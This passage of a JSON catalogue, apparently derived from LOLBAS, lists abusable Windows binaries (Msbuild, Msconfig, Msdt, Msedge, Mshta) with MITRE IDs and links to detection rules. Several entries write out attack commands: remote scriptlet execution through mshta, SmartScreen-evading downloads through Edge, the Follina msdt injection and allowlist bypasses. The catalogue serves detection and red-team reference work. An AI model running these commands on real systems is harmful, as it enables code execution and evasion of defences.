(x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Msbuild.exe should not normally be executed on workstations"}],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msbuild-exe:4","toolId":"lolbas:msbuild-exe","toolName":"Msbuild.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msbuild.exe @{PATH:.rsp}","description":"By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.","usecase":"Bypass command-line based detections","mitre":["T1036"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Msbuild.exe should not normally be executed on workstations"}],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msconfig-exe:0","toolId":"lolbas:msconfig-exe","toolName":"Msconfig.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Msconfig.exe -5","description":"Executes command embeded in crafted c:\\windows\\system32\\mscfgtlc.xml.","usecase":"Code execution using Msconfig.exe","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\msconfig.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml"},{"type":"IOC","value":"mscfgtlc.xml changes in system32 folder"}],"references":["https://twitter.com/pabraeken/status/991314564896690177","https://lolbas-project.github.io/lolbas/Binaries/Msconfig/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msdt-exe:0","toolId":"lolbas:msdt-exe","toolName":"Msdt.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msdt.exe -path C:\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE","description":"Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the .xml file.","usecase":"Execute code","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Msdt.exe","C:\\Windows\\SysWOW64\\Msdt.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://twitter.com/harr0ey/status/991338229952598016","https://twitter.com/nas_bench/status/1531944240271568896","https://lolbas-project.github.io/lolbas/Binaries/Msdt/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msdt-exe:1","toolId":"lolbas:msdt-exe","toolName":"Msdt.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msdt.exe -path C:\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE","description":"Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the .xml file.","usecase":"Execute code bypass Application whitelisting","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Msdt.exe","C:\\Windows\\SysWOW64\\Msdt.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://twitter.com/harr0ey/status/991338229952598016","https://twitter.com/nas_bench/status/1531944240271568896","https://lolbas-project.github.io/lolbas/Binaries/Msdt/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msdt-exe:2","toolId":"lolbas:msdt-exe","toolName":"Msdt.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msdt.exe /id PCWDiagnostic /skip force /param \"IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe\"","description":"Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the \"PCWDiagnostic\" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.","usecase":"Execute code bypass Application allowlisting","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Msdt.exe","C:\\Windows\\SysWOW64\\Msdt.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://twitter.com/harr0ey/status/991338229952598016","https://twitter.com/nas_bench/status/1531944240271568896","https://lolbas-project.github.io/lolbas/Binaries/Msdt/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msedge-exe:0","toolId":"lolbas:msedge-exe","toolName":"Msedge.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"msedge.exe {REMOTEURL:.exe.txt}","description":"Edge will launch and download the file. A 'harmless' file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen.","usecase":"Download file from the internet","mitre":["T1105"],"privilege":"user","fullPath":["c:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe","c:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml"}],"references":["https://twitter.com/mrd0x/status/1478116126005641220","https://twitter.com/mrd0x/status/1478234484881436672","https://lolbas-project.github.io/lolbas/Binaries/Msedge/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msedge-exe:1","toolId":"lolbas:msedge-exe","toolName":"Msedge.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"msedge.exe --headless --enable-logging --disable-gpu --dump-dom \"{REMOTEURL:.base64.html}\" > {PATH:.b64}","description":"Edge will silently download the file. File extension should be .html and binaries should be encoded.","usecase":"Download file from the internet","mitre":["T1105"],"privilege":"user","fullPath":["c:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe","c:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml"}],"references":["https://twitter.com/mrd0x/status/1478116126005641220","https://twitter.com/mrd0x/status/1478234484881436672","https://lolbas-project.github.io/lolbas/Binaries/Msedge/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msedge-exe:2","toolId":"lolbas:msedge-exe","toolName":"Msedge.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msedge.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"","description":"Edge spawns cmd.exe as a child process of msedge.exe and executes the specified command","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1218.015"],"privilege":"user","fullPath":["c:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe","c:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml"}],"references":["https://twitter.com/mrd0x/status/1478116126005641220","https://twitter.com/mrd0x/status/1478234484881436672","https://lolbas-project.github.io/lolbas/Binaries/Msedge/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mshta-exe:0","toolId":"lolbas:mshta-exe","toolName":"Mshta.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mshta.exe {PATH:.hta}","description":"Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.","usecase":"Execute code","mitre":["T1218.005"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"mshta.exe executing raw or obfuscated script within the command-line"},{"type":"IOC","value":"General usage of HTA file"},{"type":"IOC","value":"msthta.exe network connection to Internet/WWW resource"},{"type":"IOC","value":"DotNet CLR libraries loaded into mshta.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - mshta.exe.log"}],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mshta-exe:1","toolId":"lolbas:mshta-exe","toolName":"Mshta.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mshta.exe vbscript:Close(Execute(\"GetObject(\"\"script:{REMOTEURL:.sct}\"\")\"))","description":"Executes VBScript supplied as a command line argument.","usecase":"Execute code","mitre":["T1218.005"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"mshta.exe executing raw or obfuscated script within the command-line"},{"type":"IOC","value":"General usage of HTA file"},{"type":"IOC","value":"msthta.exe network connection to Internet/WWW resource"},{"type":"IOC","value":"DotNet CLR libraries loaded into mshta.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - mshta.exe.log"}],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mshta-exe:2","toolId":"lolbas:mshta-exe","toolName":"Mshta.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mshta.exe javascript:a=GetObject(\"script:{REMOTEURL:.sct}\").Exec();close();","description":"Executes JavaScript supplied as a command line argument.","usecase":"Execute code","mitre":["T1218.005"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"mshta.exe executing raw or obfuscated script within the command-line"},{"type":"IOC","value":"General usage of HTA file"},{"type":"IOC","value":"msthta.exe network connection to Internet/WWW resource"},{"type":"IOC","value":"DotNet CLR libraries loaded into mshta.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - mshta.exe.log"}],"references":["https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4","https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Mshta/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mshta-exe:3","toolId":"lolbas:mshta-exe","toolName":"Mshta.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"mshta.exe \"{PATH_ABSOLUTE}:file.hta\"","description":"Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.","usecase":"Execute code hidden in alternate data 